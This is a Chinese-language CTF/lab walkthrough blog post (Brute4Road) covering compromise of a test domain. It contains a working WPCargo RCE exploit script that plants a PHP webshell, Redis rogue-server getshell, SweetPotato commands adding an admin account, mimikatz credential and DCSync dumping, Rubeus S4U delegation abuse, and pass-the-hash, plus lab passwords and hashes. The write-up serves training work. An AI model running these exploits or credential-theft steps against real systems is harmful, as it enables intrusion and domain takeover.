redis\u672a\u6388\u6743\u6253\u4e3b\u4ece\u590d\u5236\nbase64\u7684suid\u63d0\u6743\nwordpress\u7684WPCargo\u63d2\u4ef6\u6f0f\u6d1e\u5229\u7528\nfscan\u6307\u5b9a\u5b57\u5178\u7206\u7834mssql\u5bc6\u7801\nmssql\u914d\u5408\u751c\u571f\u8c46\u63d0\u6743\nbloodhound\u57df\u4fe1\u606f\u6536\u96c6\n\u7ea6\u675f\u6027\u59d4\u6d3e\u83b7\u53d6CIFS\u4e0eIDAP\u670d\u52a1<\/code><\/pre>\nflag1<\/h3>\n
\u9996\u5148fscan\u626b\u5230\u4e00\u4e2aredis\u672a\u6388\u6743\uff0cAnother Redis Desktop Manager\u8fde\u4e00\u4e0b\uff0c\u53d1\u73b0\u662fredis5.0\u7248\u672c\uff0cLinux\u7cfb\u7edf<\/p>\n
start infoscan\n39.99.132.187:6379 open\n39.99.132.187:80 open\n39.99.132.187:21 open\n39.99.132.187:22 open\n[*] alive ports len is: 4\nstart vulscan\n[*] WebTitle http:\/\/39.99.132.187 code:200 len:4833 title:Welcome to CentOS\n[+] ftp 39.99.132.187:21:anonymous\n [->]pub\n[+] Redis 39.99.132.187:6379 unauthorized file:\/usr\/local\/redis\/db\/dump.rdb\n\u5df2\u5b8c\u6210 4\/4\n[*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 44.2929338s<\/code><\/pre>\n\u7528redis-rogue-server\u6253\u4e3b\u4ece\u590d\u5236\u4e00\u952egetshell<\/p>\n
![\"Brute4Road_1\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_1.png\")
<\/p>\n
\u5f39\u5230shell\u4e4b\u540e\u6362\u6210\u4ea4\u4e92shell<\/p>\n
python3 -c "import pty;pty.spawn('\/bin\/bash')"<\/code><\/pre>\n![\"Brute4Road_2\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_2.png\")
<\/p>\n
\u63a5\u7740vshell\u4e00\u952e\u4e0a\u7ebf\uff0cflag1\u6ca1\u6743\u9650\u8bfb\uff0c\u67e5\u627esuid\u6743\u9650\u6587\u4ef6\u53d1\u73b0\u6709base64<\/p>\n
![\"Brute4Road_3\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_3.png\")
<\/p>\n
GTFOBins\u770b\u4e00\u4e0b<\/p>\n
![\"Brute4Road_4\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_4.png\")
<\/p>\n
base64 \/home\/redis\/flag\/flag01 | base64 -d<\/code><\/pre>\n\u62ff\u5230\u7b2c\u4e00\u4e2aflag<\/p>\n
![\"Brute4Road_5\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_5.png\")
<\/p>\n
flag{e24d0138-b04b-49c6-8b40-69215404a014}<\/code><\/pre>\nflag2<\/h3>\n
\u4e0a\u4f20fscan\u548cgost\uff0c\u7ee7\u7eed\u626b\u5185\u7f51<\/p>\n
start infoscan\ntrying RunIcmp2\nThe current user permissions unable to send icmp packets\nstart ping\n(icmp) Target 172.22.2.16 is alive\n(icmp) Target 172.22.2.3 is alive\n(icmp) Target 172.22.2.7 is alive\n(icmp) Target 172.22.2.34 is alive\n(icmp) Target 172.22.2.18 is alive\n[*] Icmp alive hosts len is: 5\n172.22.2.7:6379 open\n172.22.2.18:445 open\n172.22.2.34:445 open\n172.22.2.3:445 open\n172.22.2.16:1433 open\n172.22.2.16:445 open\n172.22.2.34:139 open\n172.22.2.18:139 open\n172.22.2.3:139 open\n172.22.2.16:139 open\n172.22.2.34:135 open\n172.22.2.16:135 open\n172.22.2.16:80 open\n172.22.2.18:80 open\n172.22.2.18:22 open\n172.22.2.7:80 open\n172.22.2.7:22 open\n172.22.2.7:21 open\n172.22.2.3:135 open\n172.22.2.3:88 open\n[*] alive ports len is: 20\nstart vulscan\n[*] NetInfo \n[*]172.22.2.3\n [->]DC\n [->]172.22.2.3\n[*] NetInfo \n[*]172.22.2.16\n [->]MSSQLSERVER\n [->]172.22.2.16\n[*] WebTitle http:\/\/172.22.2.16 code:404 len:315 title:Not Found\n[*] NetInfo \n[*]172.22.2.34\n [->]CLIENT01\n [->]172.22.2.34\n[*] NetBios 172.22.2.34 XIAORANG\\CLIENT01 \n[*] WebTitle http:\/\/172.22.2.7 code:200 len:4833 title:Welcome to CentOS\n[*] NetBios 172.22.2.3 [+] DC:DC.xiaorang.lab Windows Server 2016 Datacenter 14393\n[*] NetBios 172.22.2.16 MSSQLSERVER.xiaorang.lab Windows Server 2016 Datacenter 14393\n[*] OsInfo 172.22.2.16 (Windows Server 2016 Datacenter 14393)\n[*] OsInfo 172.22.2.3 (Windows Server 2016 Datacenter 14393)\n[*] NetBios 172.22.2.18 WORKGROUP\\UBUNTU-WEB02 \n[+] ftp 172.22.2.7:21:anonymous \n [->]pub\n[*] WebTitle http:\/\/172.22.2.18 code:200 len:57738 title:\u53c8\u4e00\u4e2aWordPress\u7ad9\u70b9\n\u5df2\u5b8c\u6210 20\/20\n[*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 13.019556614s<\/code><\/pre>\n\u53d1\u73b0\u4e3b\u673a172.22.2.18<\/code>\u6709wordpress<\/p>\ngost\u8bbe\u7f6e\u597d\u4ee3\u7406\uff0c\u5728kali\u7528wpscan\u770b\u63d2\u4ef6\u5b89\u88c5\u60c5\u51b5<\/p>\n
proxychains4 wpscan --url http:\/\/172.22.2.18\/ <\/code><\/pre>\n![\"Brute4Road_6\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_6.png\")
<\/p>\n
\u53d1\u73b0wpcargo\uff0c\u6253WPCargo\u63d2\u4ef6<6.9.0 \u672a\u6388\u6743RCE(CVE-2021-25003)\uff0c\u811a\u672c\u8fd0\u884c\u540e\u4f1a\u751f\u6210webshell.php<\/code><\/p>\nimport sys\nimport binascii\nimport requests\n\n# This is a magic string that when treated as pixels and compressed using the png\n# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file\npayload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'\ndef encode_character_code(c: int):\n return '{:08b}'.format(c).replace('0', 'x')\n\ntext = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]\n\ndestination_url = 'http:\/\/172.22.2.18\/'\ncmd = 'whoami'\n\n# With 1\/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.\nrequests.get(\n f"{destination_url}wp-content\/plugins\/wpcargo\/includes\/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=\/var\/www\/html\/webshell.php"\n)\n\n# We have uploaded a webshell - now let's use it to execute a command.\nprint(requests.post(\n f"{destination_url}webshell.php?1=system", data={"2": cmd}\n).content.decode('ascii', 'ignore'))<\/code><\/pre>\n\u5199\u4e00\u53e5\u8bdd\u6728\u9a6c\u4e4b\u540e\u8681\u5251\u8fde\u63a5<\/p>\n
![\"Brute4Road_7\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_7.png\")
<\/p>\n
\u5728wp-config.php<\/code>\u770b\u5230\u6570\u636e\u5e93\u8d26\u5bc6<\/p>\n![\"Brute4Road_8\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_8.png\")
<\/p>\n
wpuser\/WpuserEha8Fgj9<\/code><\/pre>\n\u56e0\u4e3a\u5916\u7f51\u8bbf\u95ee\u4e0d\u5230\uff0c\u7528\u8681\u5251\u81ea\u5e26\u7684\u6570\u636e\u5e93\u8fde\u63a5\uff0c\u4e00\u5f00\u59cb\u9009mysql\u8fde\u4e0d\u4e0a\uff0c\u68c0\u6d4b\u4e4b\u540e\u53d1\u73b0\u8981\u9009mysqli<\/p>\n
![\"Brute4Road_9\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_9.png\")
<\/p>\n
![\"Brute4Road_10\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_10.png\")
<\/p>\n
\u540e\u9762\u53d1\u73b0\u4e3b\u673a\u7684\u8681\u5251\u8fdb\u884c\u6570\u636e\u5e93\u67e5\u8be2\u7684\u65f6\u5019\uff0c\u4f1a\u4e00\u76f4\u8f6c\u5708\u65e0\u6cd5\u8f93\u51fa\u7ed3\u679c\uff0c\u9042\u6539\u7528ubuntu\u865a\u62df\u673a\u7684\u8681\u5251<\/p>\n
\u62ff\u5230flag2<\/p>\n
![\"Brute4Road_11\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_11.png\")
<\/p>\n
flag{c757e423-eb44-459c-9c63-7625009910d8}<\/code><\/pre>\nflag3<\/h3>\n
\u9664\u4e86flag2\u8fd8\u53d1\u73b0\u6709\u4e2a\u5bc6\u7801\u5b57\u5178\uff0c\u6b63\u597d\u524d\u9762fscan\u8fd8\u626b\u63cf\u5230172.22.2.16<\/code>\u4e3b\u673a\u6709\u4e2amssql\u670d\u52a1\uff0c\u5bfc\u51fa\u4e4b\u540e\u7ee7\u7eed\u7528fscan\u6307\u5b9a\u8be5\u5b57\u5178\u53bb\u8fdb\u884c\u7206\u7834<\/p>\n![\"Brute4Road_12\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_12.png\")
<\/p>\n
fscan.exe -h 172.22.2.16 -m mssql -pwdf pass.txt\n\nstart infoscan\n172.22.2.16:1433 open\n[*] alive ports len is: 1\nstart vulscan\n\u5df2\u5b8c\u6210 0\/1 [-] mssql 172.22.2.16:1433 sa wEyjmc6K mssql: login error: \u7528\u6237 'sa' \u767b\u5f55\u5931\u8d25\u3002\n\u5df2\u5b8c\u6210 0\/1 [-] mssql 172.22.2.16:1433 sa cvqnrH6p mssql: login error: \u7528\u6237 'sa' \u767b\u5f55\u5931\u8d25\u3002\n\u5df2\u5b8c\u6210 0\/1 [-] mssql 172.22.2.16:1433 sa oyg6fOnN mssql: login error: \u7528\u6237 'sa' \u767b\u5f55\u5931\u8d25\u3002\n[+] mssql 172.22.2.16:1433:sa ElGNkOiC\n\u5df2\u5b8c\u6210 1\/1\n[*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 3m34.1517551<\/code><\/pre>\n\u62ff\u5230 mssql \u8d26\u5bc6\uff0c\u4e0aMDUT\u8fde\u63a5<\/p>\n
sa\/ElGNkOiC<\/code><\/pre>\n![\"Brute4Road_13\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_13.png\")
<\/p>\n
\u628a\u63d2\u4ef6\u90fd\u6fc0\u6d3b\u4e00\u4e0b\uff0c\u7136\u540e\u4e0a\u4f20\u751c\u571f\u8c46\u63d0\u6743<\/p>\n
![\"Brute4Road_14\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_14.png\")
<\/p>\n
\u63a5\u7740\u6dfb\u52a0\u7ba1\u7406\u5458\u8d26\u6237\u7136\u540eRDP\u767b\u5f55<\/p>\n
C:\/Users\/Public\/sweetpotato.exe -a "net user simho whoami@123 \/add"\nC:\/Users\/Public\/sweetpotato.exe -a "net localgroup administrators simho \/add"<\/code><\/pre>\n\u62ff\u5230\u7b2c\u4e09\u4e2aflag<\/p>\n
![\"Brute4Road_15\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_15.png\")
<\/p>\n
flag{3299e927-7509-4a29-b746-179d7d8e878f}<\/code><\/pre>\nflag4<\/h3>\n
\u63a5\u7740\u53d1\u73b0\u57df\u73af\u5883\uff0c\u4e0asharphound\u6536\u96c6\u4fe1\u606f\uff0c\u6ce8\u610f\u5f97\u62ff\u4e4b\u524d\u571f\u8c46\u63d0\u6743\u7684system\u6743\u9650\u6267\u884c\u6536\u96c6\u547d\u4ee4\uff0c\u56e0\u4e3a\u81ea\u5df1\u6dfb\u52a0\u7684\u7528\u6237\u662f\u4e0d\u5728\u57df\u4e2d\u7684<\/p>\n
![\"Brute4Road_16\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_16.png\")
<\/p>\n
C:\/Users\/Public\/sweetpotato.exe -a "C:\\Users\\simho\\Desktop\\123\\SharpHound_4.7-64.exe -c all"<\/code><\/pre>\n![\"Brute4Road_17\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_17.png\")
<\/p>\n
\u8fd9\u91cc\u8fd0\u884c\u5b8c\u5e76\u6ca1\u6709\u5728\u5f53\u524d\u76ee\u5f55\u751f\u6210bloodhound.zip<\/code>\uff0c\u641c\u7d22\u53d1\u73b0\u662f\u5728C:\\Windows\\SysWOW64<\/code>\u76ee\u5f55\u4e0b\uff0c\u6709\u70b9\u6ca1\u641e\u61c2<\/p>\n![\"Brute4Road_18\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_18.png\")
<\/p>\n
\u4e0a\u4f20\u4e4b\u540e\u53d1\u73b0MSSQLSERVER.XIAORANG.LAB<\/code>\u673a\u5668\u5177\u6709\u5bf9DC.XIAORANG.LAB<\/code> \u673a\u5668\u7684\u7ea6\u675f\u59d4\u6d3e\u6743\u9650
\n\u987a\u5e26\u4e00\u63d0\uff0c\u5982\u679c\u6536\u96c6\u7684zip\u4e0a\u4f20\u5230bloodhound\u4e00\u76f4\u5904\u4e8eNaN\u6216\u80050%\uff0c\u9700\u8981\u6362\u4e00\u4e0bSharpHound.exe\u7684\u7248\u672c<\/p>\n![\"Brute4Road_19\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_19.png\")
<\/p>\n
![\"Brute4Road_20\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_20.png\")
<\/p>\n
![\"Brute4Road_21\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_21.png\")
<\/p>\n
\u53ef\u4ee5\u5c1d\u8bd5\u901a\u8fc7\u7ea6\u675f\u59d4\u6d3e\u653b\u51fb\u83b7\u53d6CIFS<\/code>\u548cIDAP<\/code>\u670d\u52a1\uff0c\u5148mimikatz\u6293\u53d6\u673a\u5668\u7528\u6237hash<\/p>\nprivilege::debug\nsekurlsa::logonpasswords<\/code><\/pre>\n\u7136\u540e\u5229\u7528Rubeus\u7533\u8bf7\u8bbf\u95ee\u81ea\u8eab\uff08MSSQLSERVER\uff09\u670d\u52a1\u7684TGT\u7968\u636e<\/p>\n
Rubeus.exe asktgt \/user:MSSQLSERVER$ \/rc4:27ef78cd918fdce49b05d608774928a3 \/domain:xiaorang.lab \/dc:DC.xiaorang.lab \/nowrap<\/code><\/pre>\n![\"Brute4Road_22\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_22.png\")
<\/p>\n
\u4f2a\u9020 S4U \u8bf7\u6c42\uff0c\u4ee5 Administrador \u7528\u6237\u6743\u9650\u8bf7\u6c42\u53d7\u59d4\u6d3e\u7684CIFS\u670d\u52a1\u7968\u636e\u5e76\u6ce8\u5165\u5230\u5185\u5b58<\/p>\n
Rubeus.exe s4u \/impersonateuser:Administrator \/msdsspn:CIFS\/DC.xiaorang.lab \/dc:DC.xiaorang.lab \/ptt \/ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE2z2r4Uk7+0DRXOMmb8bcqhbuv5B8asTmQgvTOPzPlnBdFg58tIHMAOrbJk9ZqTPDooLtxdS77neAf2BgZ1ZBlFuuZUrDU7P4cQ9wXvhUn0hsL+5IlNswjZ8KaFJw4nsocCFOZtXf1CHf31YzWgSzChvnK3ZmXZ71+uxh78yf9+NqD9nuYnS1ml6968u8ycNKLU2PWjgPjy3kaLl9fibqQVWcQFzP+09gN1u7fChMsiHpd563PQoY7jXr1gdEdC\/4prQPAyGsDZrLK7VNQnotyP1wtfAP6Gk1Congou\/G7LQcz0WNRIWY30uc6Gjv83gPaAfBLQ3uNFeK94wFxgT08s4lYD5C732ZV1CFSLA9Ygs2Vd7+lUQRDUTDhBHUmCjmAOjhP3J4ThFdirimEC+YFmXe+\/VRZRgT489SNG391zqReMTR8NfTyzfDqNsJ\/K0ieS+ETR9FaUBu6inVAF7rx7Tm6ArupnccUw1shMeRJGasO0lg36MDF9KNaQo\/kEWSgby5Q3LNck4eEuxORZWcZtRoltTQjEhzKSt97XHdalcv7llbr2Ze84LcoqK7ewPCuGK\/5Vf3gPNa3Xy57RqD3Ndsw8iZBeiSFj7XtzvgB\/+gwRWZ\/IVbfPFJV+nUwIN342uGvd3X8TyDapCWLgCsfsP9ufA7WxuDzU1UDMtyfu36f3svG1cEQSzPvs6bBFXQK0Tmc7vGI7rGkRdVAxGvedHSYXNJTfMV4ZuxQ+hX7op\/Cc5tRTBFPVjuT4ZXuE65g2XKEnD2EzLrcMkVqSW9PL7DRk7zGjP8IApTzenJqEZnPmp1YPwp06AzAfmN3FPBeVoEJpj8gNlOCBM2z77dGX8XxkMu4XEydGn9nStTYAHlFmU2Jl5aEi1sXG8yC0cNRmSUH1BumEnQDys1mhmSg0I7Kixw\/m6X0bvPNag76QaMZngLZ9zNBCRLVISojuDIcUrniq5AVY4UrHELC0Mpj17iNocETDplNhz8H8EkH1pGHwMEeGy7lqUt+t\/QM1b0WK\/s4w\/SSlJ11Hbdzqg0YJ+krZdnMSTXlWz3maSEvFws4HSJLWPFCEJrHINKW1y24oOZic5iSiPy6k5jVmZ\/QuYMZ57w1YWIrpDolMKCDDxDC6v\/GFLdAM\/oSdsMfC7LKSiv4hg\/PNiJy2i23tIlMl65ffl2z0GCE0mJ91Sb4sEprxklTgpiZ5ba+RMa7TiiY+MiCLmsSTvz24Ps37SnkxYeEXR+RJ\/tizNptEOF4C+w4kp1tGwtra+qKUzfB8uaoSHo0K8E+DLhraK+t6pNo+WEF8QzT1\/phlvztsoOGF4b\/+7vi3+43d47z1WZ9PNCSlY3YUKKbY2uEj1d4eN7n0BUbCnSVWcA7N8K3OrT4bkzFhtqJmmZRxFm2\/Pi0KKv2fWs2Q1q4xh4FEupa0BxY2y6jAUFn2qGOvmrXMyTVPNgHRdcBtRkLcLxrdV7+jgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBB+mHlXf83DLVIUXcfE+zwsoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDI1MDIxOTA5MTUxN1qmERgPMjAyNTAyMTkxOTE1MTdapxEYDzIwMjUwMjI2MDkxNTE3WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==<\/code><\/pre>\nklist<\/code>\u67e5\u770b\u7968\u636e<\/p>\n![\"Brute4Road_23\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_23.png\")
<\/p>\n
\u7136\u540e\u5c31\u53ef\u4ee5\u901a\u8fc7CIFS\u53bb\u8bbf\u95eeDC\u4e0ac\u76d8\u4e2d\u7684\u6587\u4ef6\uff0c\u83b7\u53d6\u6700\u540e\u4e00\u4e2aflag<\/p>\n
![\"Brute4Road_24\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_24.png\")
<\/p>\n
dir \\\\DC.xiaorang.lab\\c$<\/code><\/pre>\n\u6216\u8005\u4f2a\u9020 S4U \u8bf7\u6c42\uff0c\u4ee5 Administrador \u7528\u6237\u6743\u9650\u8bf7\u6c42\u53d7\u59d4\u6d3e\u7684IDAP\u670d\u52a1\u7968\u636e\u5e76\u6ce8\u5165\u5230\u5185\u5b58<\/p>\n
Rubeus.exe s4u \/impersonateuser:Administrator \/msdsspn:LDAP\/DC.xiaorang.lab \/dc:DC.xiaorang.lab \/ptt \/ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE3auoRlyBIfZQEi+OkIiCi4EwTmrs+XliRcaSleopeaHBj+9PW4bvDDUvN4d4DnhYnK9xnx9c7Xfsz5+fIN2j1XjlWT\/xI1WsmRNfPXP\/vxeZFzwvdV\/NQBR8vtLYhWqA+tGgAu\/nSM9Yqdb\/xm6BmmHDxDxueESk2k647YdogBePxIM6gohM23XeW7\/uxbdk\/NsXnVTbdTtrwrCu0rmckhiemUKM8S1Yi9Ru2kJweLngFzsUz+4hBM2h+G+ItdFKLmQGc0VQ7UBOQY921OdpZW0WeBf\/GImvQrfAcVeidCgwmOG2mutDnGZl97BZH1rjy5\/qDwR7+OK7mc64gJGxfhxeWbfD1W3nhOs2MPf3iqAsrScMpTnDpr\/EiR\/OQWH6WdNj1TDhbPH7dl5\/G+6qxb0Y6wo6lWICtOff148zrGX7a4QeXfua+dSKQVinFBqy+4uF25Mr6T82KFcBn5IqjUFpPPwTtdCqc\/KADKmFd5B7l70MMFetrYCo6jxCsv0kVeM7G7zI5rx4J6ptw3PQ542c\/XtFN89EswaIwVsGcMExLL\/cXWZmBAzwNn7BmAmO+CpM2TEaoRSwG2XAAb\/gfQ\/3EE8dnDZqQV8ZB8XuL1mjoNj4XJuSScooCFuRP0whluGbSPCx8NmLnzOYumGg2pNJLgEeCgT1HzG9em7rw1X1UoeAHbEmq7H4MfYuy5BXjTl5mQeJGjLOehPWN4u3EmIzj5kkRYMEVupUE3N0FFU0MgFoiesD\/rPJHufYCDAhzP7qyyWFffhOCcQtOGHzUHBO20yqtjYoYrxw5b3JffISf9IKKloK4Q2FkIxvzd\/+kme1WJ0UBPOWIYsjw8No2TXAiEUMiB7YhFvN\/NzeUNs4f0E7W79qA6yv1wUyQjcTqUmDxE736bWd1E0aWZ0opdF\/yPkLcAaN0byfTKn75tOShw2AFAgi5wv66PtEiIqdV6KkMoz3rbHYzQcIXB3piT8JGH6sKEbJXCWu5PFCBB+daWx6qMl5Igjta\/klk43iQ36jGt5bsVdl\/HKnpEFHKcB0KMdnEIp3+5ZiynXsobg3QR19HrCvKphgecgSAPTPl0OwqptX6Tg7bRW5Qj\/N\/4vW0VT5bUs\/IG+wwVgaxsBy6vXLDi5kRebS8vhcqOliypGkTKozX0pmW2FJFF\/Gc2nDm12hLaLx+ArD22MR+ddN0xRkA08mIl70\/oR7DgSWgWiILZvRbGA09B33WVVe7ui5uxB6LlIO6Ttpup6n\/05BvcI9lXatra2oClNiq\/YJEFMvaiyL0p6PXH+J2uBQuBtUWaMAh3cGD9uMMg1IB5pWLWO9DDFsI7luELJa988uZb7W15H6Kq\/9L6OCgfakTZR0Or3iSeLVQ7mYb89oj+W3+q03oFAi\/M6l\/oGJxx\/odOzTpZyxyzva4FXIcdGdOUP\/0JQ0R7mDPvedj4ah5DYYig7JeOhfw\/FT6NLaCjgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBCqYmKp8Cr965f3DUQUYr78oQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDI1MDIxODE1MDMxNFqmERgPMjAyNTAyMTkwMTAzMTRapxEYDzIwMjUwMjI1MTUwMzE0WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==<\/code><\/pre>\nklist<\/code>\u67e5\u770b\u7968\u636e<\/p>\n![\"Brute4Road_25\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_25.png\")
<\/p>\n
\u7136\u540e\u5c31\u53ef\u4ee5\u901a\u8fc7 ldap \u670d\u52a1\u6743\u9650\u8c03\u7528 Directory Replication Service (DRS)\uff0c\u4ece\u800c\u8fdb\u884c DCSync \u653b\u51fb\uff0c\u5229\u7528mimikatz\u53bb\u83b7\u53d6DC\u4e2dadministrator\u7684hash<\/p>\n
mimikatz.exe "lsadump::dcsync \/domain:xiaorang.lab \/user:Administrator" exit\n\n1a19251fbd935969832616366ae3fe62<\/code><\/pre>\n\u7136\u540e\u901a\u8fc7PTH\u767b\u5f55\u67e5\u770bflag<\/p>\n
proxychains4 impacket-smbexec -hashes :1a19251fbd935969832616366ae3fe62 xiaorang.lab\/administrator@172.22.2.3 -codec gbk<\/code><\/pre>\n![\"Brute4Road_26\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/02\/Brute4Road_26.png\")
<\/p>\n
flag{2621f9cc-e9c9-49be-acc4-77cc6c5483b2}<\/code><\/pre>\n<\/div>","protected":false},"excerpt":{"rendered":"Brute4Road \u6d89\u53ca\u7684\u77e5\u8bc6\u70b9 redis\u672a\u6388\u6743\u6253\u4e3b\u4ece\u590d\u5236 base64\u7684suid\u63d0\u6743 wordpress […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-691","post","type-post","status-publish","format-standard","hentry","category-pentesting"],"views":395,"_links":{"self":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/691","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=691"}],"version-history":[{"count":8,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/691\/revisions"}],"predecessor-version":[{"id":1009,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/691\/revisions\/1009"}],"wp:attachment":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=691"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=691"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=691"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}